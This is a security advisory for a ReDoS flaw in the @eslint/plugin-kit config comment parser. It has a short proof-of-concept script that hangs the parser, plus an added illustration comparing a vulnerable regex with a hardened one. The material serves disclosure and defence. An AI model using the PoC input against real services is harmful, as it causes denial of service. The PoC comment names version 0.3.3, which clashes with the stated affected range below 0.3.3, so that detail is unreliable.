Headline
GHSA-xffm-g5w8-qvg7: @eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
Summary
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
Details
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
PoC
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start");
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end");
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// the program then hangs indefinitely with high CPU usage
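Added illustration, not the advisory's PoC and not @eslint/plugin-kit's code: the regex below is an assumed stand-in with the shape the Details section describes (an unanchored `([-a-zA-Z0-9/]+)` group followed by a literal, used here to quote bare keys), placed beside a hardened form that applies the advisory's advice as a negative lookbehind so a key can only begin after a character outside the class. The input generator mirrors the PoC string above so the quadratic growth and the linear fix can be measured side by side.

```javascript
// Added example, not the advisory's PoC and not @eslint/plugin-kit's code.
// VULNERABLE_KEY_RE is an assumed stand-in with the shape the advisory
// describes: an unanchored `([-a-zA-Z0-9/]+)` group followed by a literal.
// Used in a key-quoting replace, every position inside a long run of class
// characters becomes a fresh start point, and each one re-scans the rest of
// the run before failing on the "?" in the PoC input: O(n^2) work overall.
const VULNERABLE_KEY_RE = /([-a-zA-Z0-9/]+):/gu;

// Hardened form: the advisory's idea (a key may only begin after a character
// outside the class) written as a negative lookbehind, so it is non-consuming
// and the replacement template stays the same. Inside a run of class
// characters the lookbehind fails immediately, so the `+` is attempted once
// per run instead of once per character: O(n) work overall.
const HARDENED_KEY_RE = /(?<![-a-zA-Z0-9/])([-a-zA-Z0-9/]+):/gu;

// Wrap bare keys in double quotes, e.g. `curly: 2` -> `"curly": 2`.
function quoteKeysVulnerable(text) {
  return text.replace(VULNERABLE_KEY_RE, '"$1":');
}

function quoteKeysHardened(text) {
  return text.replace(HARDENED_KEY_RE, '"$1":');
}

// Same shape as the PoC string: n class characters, then a "?" that defeats
// every candidate match, then one legitimate entry.
function pocInput(n) {
  return `${"A".repeat(n)}?: 1 B: 2`;
}

// Wall-clock cost of one call in milliseconds.
function elapsedMs(fn, input) {
  const start = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Doubling n roughly quadruples the vulnerable time; the hardened regex
// finishes the PoC-sized input (1,000,000 characters) in milliseconds.
for (const n of [1000, 2000, 4000, 8000]) {
  console.log(`vulnerable n=${n}: ${elapsedMs(quoteKeysVulnerable, pocInput(n)).toFixed(1)} ms`);
}
console.log(`hardened n=1000000: ${elapsedMs(quoteKeysHardened, pocInput(1000000)).toFixed(1)} ms`);
```

The same harness doubles as a regression test for a patched regex: both forms must agree on ordinary config comments while only the hardened one stays flat as n grows.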
Impact
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.
High severity GitHub Reviewed Published Jul 18, 2025 in eslint/rewrite • Updated Jul 18, 2025
Package
npm @eslint/plugin-kit (npm)
Affected versions
< 0.3.3
References
- GHSA-xffm-g5w8-qvg7
- eslint/rewrite@b283f64
Published to the GitHub Advisory Database: Jul 18, 2025
Last updated: Jul 18, 2025